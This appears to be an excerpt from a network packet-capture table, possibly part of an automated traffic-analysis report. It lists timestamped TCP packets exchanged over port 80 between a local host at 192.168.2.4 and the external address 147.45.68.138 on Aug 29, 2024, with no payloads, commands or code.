                                                      Aug 29, 2024 22:52:29.169648886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.169657946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.169661999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.169670105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.169683933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.169709921 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.169802904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.169816017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.169826984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.169838905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.169846058 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.169850111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.169853926 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.169862032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.169876099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.169891119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.169903040 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.169975996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.169986963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.169996977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170008898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170020103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170022011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170022011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170032978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170054913 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170074940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170114994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170126915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170135975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170146942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170156956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170157909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170167923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170176983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170193911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170197010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170216084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170222998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170241117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170250893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170254946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170254946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170263052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170274019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170284033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170285940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170293093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170296907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170300007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170312881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.170330048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.170340061 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.254924059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.254950047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.254967928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.254981041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.254991055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.254995108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255004883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255022049 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255022049 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255037069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255039930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255049944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255050898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255078077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255096912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255104065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255115986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255126953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255137920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255141020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255151033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255156994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255166054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255175114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255177975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255189896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255201101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255203009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255225897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255228043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255244970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255254030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255263090 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255268097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255278111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255291939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255295038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255302906 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255322933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255335093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255337954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255352020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255362034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255379915 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255388021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255390882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255403042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255408049 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255415916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255425930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255445004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255460024 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255496979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255507946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255518913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255532980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255542994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255552053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255559921 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255564928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255584002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255594969 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255595922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255604029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255618095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255637884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255723953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255734921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255760908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255764961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255778074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255789042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255799055 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255799055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255810976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255821943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255821943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255836010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255851984 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255868912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255872011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255882978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255893946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255906105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255907059 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255918980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255932093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255947113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255954981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255959988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255971909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255983114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.255984068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.255997896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256005049 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256010056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256022930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256026983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256050110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256052971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256066084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256072044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256076097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256088972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256098032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256103039 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256117105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256124020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256129026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256136894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256169081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256320000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256331921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256341934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256355047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256361008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256371975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256397963 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256398916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256412983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256424904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256434917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256438017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256453037 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256462097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256484985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256510973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256522894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256534100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256546021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256551027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256572008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256575108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256587982 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256593943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256599903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256609917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256618977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256625891 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256644964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256747007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256769896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256783009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256784916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256794930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256805897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256810904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256818056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256829977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256831884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256840944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256848097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256854057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256864071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256884098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256891966 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256897926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256910086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256921053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256925106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256932974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256944895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256947994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256966114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256969929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.256984949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.256990910 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257004023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257008076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257029057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257030010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257039070 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257055998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257065058 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257069111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257080078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257091999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257092953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257103920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257107973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257117987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257129908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257131100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257142067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257153988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257169962 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257180929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257191896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257194996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257205009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257215023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257216930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257229090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257232904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257244110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257249117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257256985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257280111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257289886 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257293940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257306099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.257328987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.257350922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342447042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342498064 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342678070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342694998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342705011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342716932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342726946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342731953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342740059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342751026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342756987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342761040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342772961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342784882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342784882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342803955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342806101 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342817068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342823029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342835903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342845917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342854023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342859030 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342864990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342876911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342880011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342889071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342895031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342922926 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.342979908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.342992067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343000889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343012094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343020916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343024015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343045950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343071938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343111992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343128920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343139887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343152046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343157053 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343163967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343177080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343205929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343342066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343353987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343369961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343381882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343388081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343400955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343413115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343415022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343429089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343434095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343442917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343451977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343466043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343485117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343498945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343512058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343523026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343530893 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343561888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343568087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343568087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343579054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343599081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343607903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343678951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343694925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343739033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343750000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343760967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.343760967 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343803883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.343869925 CEST8049739147.45.68.138192.168.2.4
